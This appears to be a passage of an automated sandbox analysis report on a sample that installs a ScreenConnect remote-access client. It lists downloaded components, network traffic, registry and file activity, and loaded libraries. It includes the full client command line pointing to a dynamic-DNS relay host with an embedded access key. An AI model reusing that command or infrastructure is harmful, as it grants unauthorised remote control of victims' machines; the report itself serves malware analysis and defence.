                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.00000000011E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationn
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationx
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dll
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.dll#
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2421960225.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, 76GEJ2UX.log.1.drString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllL
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.ClientService.exe0
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windo
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2923701714.000002A175B7C000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exex
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsCl
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1001FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configL
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe8
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exeC
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileMa
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exX
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.confign
                  Source: dfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.stansup.com/Bn
                  Source: svchost.exe, 00000007.00000002.3284820423.000002487AC5F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2186905900.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063548427.000002487B53B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063592890.000002487B540000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063376488.000002487B555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3285589879.000002487B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063263833.000002487B52C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49705 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49727 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49735 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 79.110.49.185:443 -> 192.168.2.5:49791 version: TLS 1.2
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                  Spam, unwanted Advertisements and Ransom Demands

                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                  System Summary

                  Source: 3coxOaV92n.exe PE Signature Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeCode function: 11_2_053629D0 CreateProcessAsUserW,11_2_053629D0
                  Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\user.config
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508
                  Source: 3coxOaV92n.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                  Source: classification engine Classification label: mal60.evad.winEXE@20/79@2/2
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00AC1000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5508
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCommand line argument: dfshim0_2_00AC1000
                  Source: 3coxOaV92n.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: 3coxOaV92n.exeReversingLabs: Detection: 23%
                  Source: unknownProcess created: C:\Users\user\Desktop\3coxOaV92n.exe "C:\Users\user\Desktop\3coxOaV92n.exe"
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5508 -ip 5508
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=kjh231a.zapto.org&p=8041&s=a7ee4b85-96fb-4d9a-b419-6636f94d66aa&k=BgIAAACkAABSU0ExAAgAAAEAAQAFiJkYSsHWAiMLqCRmzzktgQckyG3TGgm6yPTLawNtNX6q1gr57JH4PrLfClMTmwPp16%2ftpUu72MJPhrP9Fe%2fDAOLI7IxssEnqHo0cK7GF8605xW1%2b29YYv7Gp%2f%2bRVnS8EXpyfNuusFYa%2bCoXawQboJM2Gi1VXFl4XcMGGJmYswsgo9qU%2fBqW3jX3LRGSRskHQDuJYQ8zNUvX1ZvvvtewO8gfRa7Z6WeC1pOnkHykQZ7ux8aNy9iCaTKjcx7FnTu1T7GRag6eNtt4weTuPK2uLu2HYzL%2fVKjjkmkP1xXy2lhSPvloy810giaMzeQQElR11NNJ7O%2bcRI%2b4xi9%2bIANXb&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "b058094b-2ee9-42ec-a616-548c8b8c83a4" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe" "RunRole" "a9f9cad7-92f3-4145-a572-df5ab2869f06" "System"
                  Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 748
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process created: unknown unknown
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: apphelp.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: msasn1.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: cryptsp.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: rsaenh.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: dfshim.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: version.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: mscoree.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: urlmon.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: iertutil.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: srvcli.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: netutils.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Users\user\Desktop\3coxOaV92n.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: mscoree.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: version.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: sxs.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: wldp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: profapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: dfshim.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: netutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: rasapi32.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: rasman.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: rtutils.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: dhcpcsvc6.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: dhcpcsvc.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: wininet.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: dwrite.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: textshaping.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: windowscodecs.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: textinputframework.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: coreuicomponents.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: ntmarta.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: coremessaging.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: secur32.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: schannel.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe | Section loaded: msasn1.dll
